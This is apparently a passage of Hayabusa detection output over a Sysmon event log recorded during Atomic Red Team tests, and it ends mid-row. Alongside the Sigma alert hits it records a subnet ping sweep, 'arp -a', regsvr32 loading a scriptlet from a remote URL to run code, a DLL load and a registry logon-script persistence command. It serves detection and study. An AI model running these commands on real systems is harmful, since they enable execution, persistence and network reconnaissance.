| LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D96A-5D31-0000-0010B7603700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:30.521 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.232 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D96A-5D31-0000-0010A3633700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:31.013 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.233 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D96B-5D31-0000-001090663700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:31.530 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.234 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5016 | PGUID: 747F3D96-D96B-5D31-0000-00107C693700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:32.058 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.235 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D96C-5D31-0000-00106A6C3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:32.614 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.236 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-D96C-5D31-0000-0010BA763700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:33.018 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.237 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3228 | PGUID: 747F3D96-D96D-5D31-0000-0010A7793700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:33.548 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.238 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D96D-5D31-0000-0010937C3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:34.005 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.239 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D96D-5D31-0000-0010827F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:34.556 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.240 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D96E-5D31-0000-00106E823700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:35.024 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.241 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D96F-5D31-0000-00105A853700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:35.559 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.242 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3556 | PGUID: 747F3D96-D96F-5D31-0000-0010C78F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:36.025 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.243 | Process: C:\Windows\System32\PING.EXE | 
User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3788 | PGUID: 747F3D96-D970-5D31-0000-0010B4923700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:36.536 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.244 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D970-5D31-0000-0010A0953700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:37.012 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.245 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2700 | PGUID: 747F3D96-D971-5D31-0000-00108C983700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:37.505 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.246 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 352 | PGUID: 747F3D96-D971-5D31-0000-0010789B3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:38.043 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.247 | 
Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3120 | PGUID: 747F3D96-D972-5D31-0000-00106BA43700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:38.588 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.248 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6976 | PGUID: 747F3D96-D972-5D31-0000-001057A73700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:39.024 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.249 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2440 | PGUID: 747F3D96-D973-5D31-0000-0010A3AA3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:39.518 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.250 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5100 | PGUID: 747F3D96-D973-5D31-0000-00108FAD3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:40.006 +00:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.251 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D974-5D31-0000-00107BB03700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:40.535 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.252 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 747F3D96-D974-5D31-0000-001068B33700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:40.982 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.253 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 196 | PGUID: 747F3D96-D974-5D31-0000-001006BD3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:41.530 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.254 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1624 | PGUID: 747F3D96-D975-5D31-0000-001099C23700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:42.061 
+00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6412 | PGUID: 747F3D96-D976-5D31-0000-00104AC63700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:42.276 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6292 | PGUID: 747F3D96-D976-5D31-0000-0010DBCC3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:42.276 +00:00,MSEDGEWIN10,1,low,Disc,Suspicious Network Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:42.301 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: arp -a | Process: C:\Windows\System32\ARP.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | LID: 0x50951 | PID: 1340 | PGUID: 747F3D96-D976-5D31-0000-001034CF3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:42.404 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D976-5D31-0000-0010D8D53700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:42.815 
+00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4444 | PGUID: 747F3D96-D976-5D31-0000-001041E83700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:42.841 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2332 | PGUID: 747F3D96-D976-5D31-0000-001093EA3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:42.841 +00:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:42.841 +00:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:43.445 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 3848 | PGUID: 
747F3D96-D977-5D31-0000-00100A0E3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:43.574 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1476 | PGUID: 747F3D96-D977-5D31-0000-0010771B3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:44.026 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D978-5D31-0000-0010442F3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:44.054 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:44.054 +00:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags 
Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:44.054 +00:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:45.157 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6152 | PGUID: 747F3D96-D978-5D31-0000-00101E7A3800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:46.204 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 4336 | PGUID: 747F3D96-D97A-5D31-0000-00105DA83800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:46.565 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7148 | PGUID: 747F3D96-D97A-5D31-0000-001089BD3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:46.589 +00:00,MSEDGEWIN10,3,medium,,Network 
Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49728 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:46.589 +00:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/net_connection_win_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:46.848 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3564 | PGUID: 747F3D96-D97A-5D31-0000-00109DDC3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:46.848 +00:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:46.893 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D97A-5D31-0000-001019DE3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:46.893 
+00:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:46.975 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4628 | PGUID: 747F3D96-D97A-5D31-0000-00102BE33800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:47.083 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | LID: 0x50951 | PID: 5788 | PGUID: 747F3D96-D97B-5D31-0000-00109DEB3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:47.239 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D97B-5D31-0000-0010F0F03800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:54.976 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4240 | PGUID: 
